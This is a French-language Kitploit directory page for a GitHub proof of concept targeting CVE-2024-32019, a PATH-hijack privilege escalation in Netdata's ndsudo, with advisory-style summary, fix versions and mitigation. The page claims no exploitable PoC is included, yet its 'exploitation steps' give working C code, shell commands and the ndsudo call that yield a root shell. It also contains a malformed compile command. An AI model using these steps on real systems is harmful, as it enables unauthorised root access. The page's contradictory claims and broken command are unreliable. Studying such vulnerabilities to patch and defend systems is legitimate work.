Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2024-32019-PoC — PoC non armé et vérificateur pour CVE-2024-32019, une élévation de privilèges locale dans l'utilitaire ndsudo de Netdata. Évaluez l'exposition, validez les correctifs et comprenez le vecteur d'exploitation basé sur PATH. | Kitploit
Outils/GitHubGitHub/sphyos/cve-2024-32019-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubsphyos/cve-2024-32019-poc

cve-2024-32019-PoC

PoC non armé et vérificateur pour CVE-2024-32019, une élévation de privilèges locale dans l'utilitaire ndsudo de Netdata. Évaluez l'exposition, validez les correctifs et comprenez le vecteur d'exploitation basé sur PATH.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-32019 — Élévation de privilèges locale de Netdata ndsudo

Résumé

Le helper ndsudo de Netdata (installé avec setuid root) restreint les commandes qu'il peut exécuter, mais résout ces commandes en utilisant le PATH de l'appelant. Dans les versions impactées, un utilisateur local peut placer un binaire malveillant plus tôt dans le PATH et faire exécuter celui-ci par ndsudo avec les privilèges root. Corrigé dans Netdata 1.45.3 et 1.45.0-169.

Affecté / Corrigé

  • Affecté : >= 1.44.0-60, < 1.45.0-169 et >= 1.45.0, < 1.45.3 (selon l'avis en amont).

  • Corrigé : 1.45.3 (stable), 1.45.0-169 (nightly). GitHub

Impact

Élévation de privilèges locale vers root sur les systèmes où ndsudo est installé en SUID et où l'utilisateur peut l'invoquer (généralement les membres du groupe netdata). NVDGitHub

Cause fondamentale (haut niveau)

  • ndsudo est SUID-root et autorise des sous-commandes comme nvme-list, nvme-smart-log, etc.

  • Il appelle des exécutables externes par leur nom (par exemple nvme), qui sont résolus via PATH au lieu d'utiliser des chemins absolus ou une recherche sûre et fixe.

  • Si un répertoire inscriptible apparaît avant les chemins système, un attaquant peut introduire un binaire imitant celui attendu, qui sera exécuté en tant que root. GitHub

Reproduction / Vérification sûre

Ce dépôt inclut des vérificateurs non exploitants qui :

  • Inspectent /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (ou l'endroit où il est installé) pour vérifier le SUID/propriétaire.

  • Énumèrent le PATH pour trouver les répertoires inscriptibles situés avant les chemins système courants.

  • Confirment la présence de noms de sous-commandes autorisées que ndsudo pourrait tenter d'exécuter.

  • Exécutent optionnellement ndsudo --test <subcommand> pour afficher la commande résolue sans l'exécuter (à utiliser avec prudence, lisez le code d'abord). GitHub

⚠️ Aucun PoC exploitable n'est inclus. Ce projet est destiné aux défenseurs et aux chercheurs pour évaluer l'exposition et valider les correctifs de manière responsable.

Atténuation

  • Mettez à jour Netdata vers 1.45.3 (stable) ou 1.45.0-169 (nightly).

  • Par mesure de défense en profondeur, privilégiez les chemins absolus ou un PATH minimal assaini dans les helpers SUID ; évitez d'accorder un accès inutile à ndsudo. GitHubwiz.io

Étapes d'exploitation

1. Enregistrez le code C suivant sous le nom nvme.c :
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Compilez l'exploit
root@kitploit:~
gcc nvme.c - nvme
3. Configuration de l'environnement
root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modifiez le PATH
root@kitploit:~
export PATH=/tmp/fakebin:$PATH
5. Commande d'exploitation
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Références

  • NVD : CVE-2024-32019. NVD

  • Avis de sécurité Netdata (GHSA-pmhq-4cxq-wj93). GitHub

  • Résumé de Wiz. wiz.io

  • Analyse de Snyk. Guide de vulnérabilité

  • Liste MITRE/CVE. CVE

Télécharger l’outil